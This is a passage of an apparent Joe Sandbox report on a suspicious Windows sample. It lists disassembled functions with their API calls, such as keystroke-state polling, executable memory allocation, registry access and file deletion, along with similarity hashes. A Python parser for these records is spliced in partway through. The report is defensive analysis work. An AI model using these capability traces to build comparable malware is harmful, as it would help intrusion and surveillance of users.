                                                              • Opcode Fuzzy Hash: c70d7ba115e5f1ae24b81e8ecf40b8f44ebd81f47c17c40317a95cb5e1f31c8e
                                                              • Instruction Fuzzy Hash: 74E0EDB12042A4A7E6213A6B9C00F7A3648EB42FA4F156121BC2AD60E0DB60DF0183F8
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 72e21fc608036fb5576d2a5f364e3712dee8b14d6822edb0d51d1884f4e851e9
                                                              • Instruction ID: 110e1e57da4038bc3dd27839c06d245571df39c26327244e3ade44e554d8c212
                                                              • Opcode Fuzzy Hash: 72e21fc608036fb5576d2a5f364e3712dee8b14d6822edb0d51d1884f4e851e9
                                                              • Instruction Fuzzy Hash: 14F08575000702CFCB348F20D494816BBE0FF0432A320893EE5EB87620C731A884DB00
                                                              APIs
                                                              • _free.LIBCMT ref: 00C8512C
                                                                • Part of subcall function 00C82D58: RtlFreeHeap.NTDLL(00000000,00000000,?,00C8DB71,00D21DC4,00000000,00D21DC4,00000000,?,00C8DB98,00D21DC4,00000007,00D21DC4,?,00C8DF95,00D21DC4), ref: 00C82D6E
                                                                • Part of subcall function 00C82D58: GetLastError.KERNEL32(00D21DC4,?,00C8DB71,00D21DC4,00000000,00D21DC4,00000000,?,00C8DB98,00D21DC4,00000007,00D21DC4,?,00C8DF95,00D21DC4,00D21DC4), ref: 00C82D80
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: ErrorFreeHeapLast_free
                                                              • String ID:
                                                              • API String ID: 1353095263-0
                                                              • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                              • Instruction ID: 0c18c705ec575689d22553df903a879105e84a9aedb1c0d7e23279517a5791cb
                                                              • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                              • Instruction Fuzzy Hash: 5AE092761007059FC720DF6CD804A86B7E5EF85324320852AE8AED7220D371E812CB44
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: __fread_nolock
                                                              • String ID:
                                                              • API String ID: 2638373210-0
                                                              • Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                              • Instruction ID: b76bcd08f87acbfb9fb2147ff0e5d2fe0470ab81de113e0eab477a1220a09f15
                                                              • Opcode Fuzzy Hash: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
                                                              • Instruction Fuzzy Hash: 89F0D47640020DBBDF05DF90C941A9E7B69FB08318F208485F9199A152D336DA61EBA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID:
                                                              • API String ID: 176396367-0
                                                              • Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                              • Instruction ID: e1972bc9a8a667f6cce197bc407cf21010f1a723695c751895c94cdbadde7a2f
                                                              • Opcode Fuzzy Hash: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
                                                              • Instruction Fuzzy Hash: C1D0A72334245037B66D313D6D0BC7F491CCBC26A0B15803FFA0ACA1A5ED444C0311E0
                                                              APIs
                                                              • GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 00CBE7A2
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: NamePathShort_wcslen
                                                              • String ID:
                                                              • API String ID: 2021730007-0
                                                              • Opcode ID: f426db24a2946b7bbe42161f9cbf5ef2faf403c3e04977e289c7d99ee19da114
                                                              • Instruction ID: 089adf65351c33d7413b165809ebd95c615309fd2db2fe5864f3e8599eb4ef3d
                                                              • Opcode Fuzzy Hash: f426db24a2946b7bbe42161f9cbf5ef2faf403c3e04977e289c7d99ee19da114
                                                              • Instruction Fuzzy Hash: 4EE0CD7650022457CB2093589C05FDA77DDDFC8791F040070FD05D7248DD64DD849590
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,00C5B0DE,?,?,00000000,?,00C56B73,?), ref: 00C6F156
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: ffd8041388b65033f76442b8d8fae965902e60e35d3435a092a1ae45c0abea64
                                                              • Instruction ID: e4cb4a659e638456ecd6d42b2a3a0843554d753df3add60d52d87cff370fc62c
                                                              • Opcode Fuzzy Hash: ffd8041388b65033f76442b8d8fae965902e60e35d3435a092a1ae45c0abea64
                                                              • Instruction Fuzzy Hash: 56E092B5510704AFD728DF55D846D9BBBF8EB08320B00455EA85697740E7B1BD448B50
                                                              APIs
                                                              • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00C539FD
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: LongNamePath_wcslen
                                                              • String ID:
                                                              • API String ID: 541455249-0
                                                              • Opcode ID: e8e03e77aeb7b69c33868ba466025fb41b855d8b3d8217d61fdf0ed1b82e52bb
                                                              • Instruction ID: ea208a75f576631b67451cee91bed99feb2086a3eec95805ae547c65ea889b52
                                                              • Opcode Fuzzy Hash: e8e03e77aeb7b69c33868ba466025fb41b855d8b3d8217d61fdf0ed1b82e52bb
                                                              • Instruction Fuzzy Hash: 4BE0CD7650012457CB2093589C05FDA77DDDFC8791F040071FD05D7248DD64DD849590
                                                              APIs
                                                              • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 00CBE76C
                                                                • Part of subcall function 00C584B7: _wcslen.LIBCMT ref: 00C584CA
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FolderPath_wcslen
                                                              • String ID:
                                                              • API String ID: 2987691875-0
                                                              • Opcode ID: 29d0b677c28a06e7641da70db9b3787c2d800aacace9da2041695934eda6d088
                                                              • Instruction ID: 063753df8e166f2dbded867f5a6b119901b939e952a6d339fb0d31036d914b29
                                                              • Opcode Fuzzy Hash: 29d0b677c28a06e7641da70db9b3787c2d800aacace9da2041695934eda6d088
                                                              • Instruction Fuzzy Hash: 48D05EA69002282FEF60A6749C0DEBB3AACC740210F0006A07C6DD3182EA34ED8886A0
                                                              APIs
                                                              • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,00CBD9DC,?,?), ref: 00CBDA72
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CopyFile
                                                              • String ID:
                                                              • API String ID: 1304948518-0
                                                              • Opcode ID: c35d66adad45e6bb1da03e22828f067086b1332adb0cae0b20783d7238f72a56
                                                              • Instruction ID: f49a333c28e2171ed8b95381e38a76bc65349e20164d5e99a8846f5a30e19cdf
                                                              • Opcode Fuzzy Hash: c35d66adad45e6bb1da03e22828f067086b1332adb0cae0b20783d7238f72a56
                                                              • Instruction Fuzzy Hash: 2FD0A7305D0208BBEF108B50CC03F9DB76CE701B45F104194B201EE0D0C7B5A9089724
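The function records above are one block per disassembled function: the API call sites it contains with their argument snapshots and call addresses, the memory dump the code was lifted from, and the opcode and instruction hashes listed under Similarity. They are easier to pivot on as data than as text, so the following parser is added here as a worked example; it is not code from the Joe Sandbox report or its IDA plugin, and the function names (`parse_records`, `call_site_map`, `apis_by_module`, `fuzzy_hash_index`) are this example's own. It assumes only the layout visible on this page: one bullet per field, call lines shaped `Api.MODULE(args), ref: ADDR` (with an optional `Part of subcall function ADDR:` prefix), and `Instruction Fuzzy Hash` as the last field of every record. The embedded input is a constructed excerpt in that layout that reuses a few values printed above, with the `Download File` link text the HTML rendering fuses onto dump names left in so the stripping is exercised.

```python
# Parse Joe Sandbox IDA-plugin function records into data you can pivot on.
# Added example, not code from the Joe Sandbox report or its plugin; it assumes
# only the layout visible in the report (one bullet per field, call lines shaped
# 'Api.MODULE(args), ref: ADDR', 'Instruction Fuzzy Hash' last in each record).
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Matches '• ReadFile.KERNELBASE(?,?), ref: 00C5B0AC', '• _free.LIBCMT ref: 00C8512C'
# and '• Part of subcall function 00C82D58: RtlFreeHeap.NTDLL(00000000), ref: 00C82D6E'.
CALL_RE = re.compile(
    r"^•\s+(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s+)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$"
)
FIELD_RE = re.compile(r"^•\s+(?P<key>[A-Za-z_ ]+?):\s*(?P<value>.*)$")
SOURCE_RE = re.compile(r"^(?P<dump>\S+), Offset: (?P<offset>[0-9A-Fa-f]+)")


@dataclass
class Call:
    api: str
    module: str
    ref: str             # address of the call instruction in the dump
    args: str            # argument snapshot exactly as the sandbox printed it
    subcall: str | None  # parent function when the call sits inside a callee


@dataclass
class FunctionRecord:
    api_id: str = ""
    instruction_fuzzy_hash: str = ""
    source_dump: str = ""
    image_base: str = ""
    associated: list[str] = field(default_factory=list)
    calls: list[Call] = field(default_factory=list)


def parse_records(text: str) -> list[FunctionRecord]:
    """One FunctionRecord per function; 'Instruction Fuzzy Hash' closes a record.
    Indentation and the 'Download File' link text fused onto dump names are dropped."""
    records: list[FunctionRecord] = []
    cur = FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if not line.startswith("•"):
            continue  # section headers such as 'APIs' or 'Similarity'
        if m := CALL_RE.match(line):
            cur.calls.append(Call(m["api"], m["module"], m["ref"].upper(),
                                  m["args"] or "", m["sub"]))
        elif m := FIELD_RE.match(line):
            key, value = m["key"], m["value"].removesuffix("Download File").strip()
            if key == "API ID":
                cur.api_id = value
            elif key == "Associated":
                cur.associated.append(value)
            elif key == "Source File" and (s := SOURCE_RE.match(value)):
                cur.source_dump, cur.image_base = s["dump"], s["offset"].upper()
            elif key == "Instruction Fuzzy Hash":
                cur.instruction_fuzzy_hash = value
                records.append(cur)
                cur = FunctionRecord()
    return records


def call_site_map(records: list[FunctionRecord]) -> dict[str, str]:
    """Call address -> 'MODULE!Api', for annotating a disassembly of the same dump."""
    return {c.ref: f"{c.module}!{c.api}" for r in records for c in r.calls}


def apis_by_module(records: list[FunctionRecord], skip_crt: bool = True) -> dict[str, list[str]]:
    """Distinct called APIs per module; CRT internals (LIBCMT) are noise for triage."""
    out: dict[str, set[str]] = {}
    for c in (c for r in records for c in r.calls):
        if not (skip_crt and c.module == "LIBCMT"):
            out.setdefault(c.module, set()).add(c.api)
    return {m: sorted(a) for m, a in sorted(out.items())}


def fuzzy_hash_index(records: list[FunctionRecord]) -> dict[str, str]:
    """Instruction Fuzzy Hash -> API ID, to look a function body up in another report."""
    return {r.instruction_fuzzy_hash: r.api_id for r in records}


# Constructed excerpt in the report's layout, reusing values printed above.
SAMPLE = """\
APIs
• ReadFile.KERNELBASE(?,?,00010000,00000000,00000000), ref: 00C5B0AC
Memory Dump Source
• Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
• Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Similarity
• API ID: FileRead
• Instruction Fuzzy Hash: 64113A75200705DFD7308E15C480B67BBE9EF84365F10C42DE9AA8BA91C771AD89CB64
APIs
• _free.LIBCMT ref: 00C8512C
  • Part of subcall function 00C82D58: RtlFreeHeap.NTDLL(00000000,00000000), ref: 00C82D6E
• API ID: ErrorFreeHeapLast_free
• Instruction Fuzzy Hash: 5AE092761007059FC720DF6CD804A86B7E5EF85324320852AE8AED7220D371E812CB44
APIs
• CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008), ref: 00CBDA72
• API ID: CopyFile
• Instruction Fuzzy Hash: 2FD0A7305D0208BBEF108B50CC03F9DB76CE701B45F104194B201EE0D0C7B5A9089724
"""

if __name__ == "__main__":
    for ref, target in sorted(call_site_map(parse_records(SAMPLE)).items()):
        print(ref, target)
```

Run as a script it prints the call-address to `MODULE!Api` map for the sample. On a saved copy of a full report, pass the text to `parse_records`, then compare `fuzzy_hash_index` output between two samples to find shared function bodies, or use `apis_by_module` to list the Win32 surface a dump touches without the CRT noise; `call_site_map` gives you the addresses to annotate when you open the same dump in a disassembler.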
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,00C90AA4,?,?,00000000,?,00C90AA4,00000000,0000000C), ref: 00C90757
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                               • Associated: 0000000A.00000002.1595584206.0000000000C50000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000CED000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595672263.0000000000D13000.00000002.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595722616.0000000000D1D000.00000004.00000001.01000000.0000000A.sdmp
                                                               • Associated: 0000000A.00000002.1595746225.0000000000D25000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              APIs
                                                              • GetFileAttributesW.KERNELBASE(?,00CBD755), ref: 00CBE9C6
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              APIs
                                                                • Part of subcall function 00CBDB69: FindFirstFileW.KERNELBASE(?,?), ref: 00CBDBE0
                                                                • Part of subcall function 00CBDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00CBDC30
                                                                • Part of subcall function 00CBDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CBDC41
                                                                • Part of subcall function 00CBDB69: FindClose.KERNEL32(00000000), ref: 00CBDC58
                                                              • GetLastError.KERNEL32 ref: 00CC6583
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                              • String ID:
                                                              • API String ID: 2191629493-0
                                                              APIs
                                                              • CloseHandle.KERNELBASE(?,?,00000000,00C93A1C), ref: 00C57973
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,014A19BB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 014A1D77
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000003.1563565662.0000000001412000.00000004.00000020.00020000.00000000.sdmp, Offset: 014A1000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_3_1412000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,014A19BB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 014A1D77
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000003.1563565662.0000000001412000.00000004.00000020.00020000.00000000.sdmp, Offset: 01412000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_3_1412000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,014A19BB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 014A1D77
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000003.1563565662.0000000001412000.00000004.00000020.00020000.00000000.sdmp, Offset: 01457000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_3_1412000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 00CCA11B
                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00CCA176
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA181
                                                              • FindFirstFileW.KERNEL32(*.*,?), ref: 00CCA19D
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00CCA1ED
                                                              • SetCurrentDirectoryW.KERNEL32(00D17B94), ref: 00CCA20B
                                                              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CCA215
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA222
                                                              • FindClose.KERNEL32(00000000), ref: 00CCA232
                                                                • Part of subcall function 00CBE2AE: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CBE2C9
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                              • String ID: *.*
                                                              • API String ID: 2640511053-438819550
                                                              APIs
                                                                • Part of subcall function 00CDD2F7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CDC00D,?,?), ref: 00CDD314
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD350
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3C7
                                                                • Part of subcall function 00CDD2F7: _wcslen.LIBCMT ref: 00CDD3FD
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CDC89D
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00CDC908
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDC92C
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CDC98B
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CDCA46
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CDCAB3
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CDCB48
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00CDCB99
                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CDCC42
                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CDCCE1
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00CDCCEE
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                              • String ID:
                                                              • API String ID: 3102970594-0
                                                              APIs
                                                              • GetKeyboardState.USER32(?), ref: 00CBA572
                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00CBA5F3
                                                              • GetKeyState.USER32(000000A0), ref: 00CBA60E
                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00CBA628
                                                              • GetKeyState.USER32(000000A1), ref: 00CBA63D
                                                              • GetAsyncKeyState.USER32(00000011), ref: 00CBA655
                                                              • GetKeyState.USER32(00000011), ref: 00CBA667
                                                              • GetAsyncKeyState.USER32(00000012), ref: 00CBA67F
                                                              • GetKeyState.USER32(00000012), ref: 00CBA691
                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00CBA6A9
                                                              • GetKeyState.USER32(0000005B), ref: 00CBA6BB
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: State$Async$Keyboard
                                                              • String ID:
                                                              • API String ID: 541375521-0
                                                              APIs
                                                              • CoInitialize.OLE32 ref: 00CD40D1
                                                              • CoUninitialize.OLE32 ref: 00CD40DC
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00CF0B44,?), ref: 00CD4136
                                                              • IIDFromString.OLE32(?,?), ref: 00CD41A9
                                                              • VariantInit.OLEAUT32(?), ref: 00CD4241
                                                              • VariantClear.OLEAUT32(?), ref: 00CD4293
                                                              Memory Dump Source
                                                              • Source File: 0000000A.00000002.1595604712.0000000000C51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C50000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_10_2_c50000_tguujh.jbxd
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 636576611-1287834457
                                                              APIs
                                                                • Part of subcall function 00C5B25F: _wcslen.LIBCMT ref: 00C5B269
                                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00CCA4D5
                                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00CCA5E8
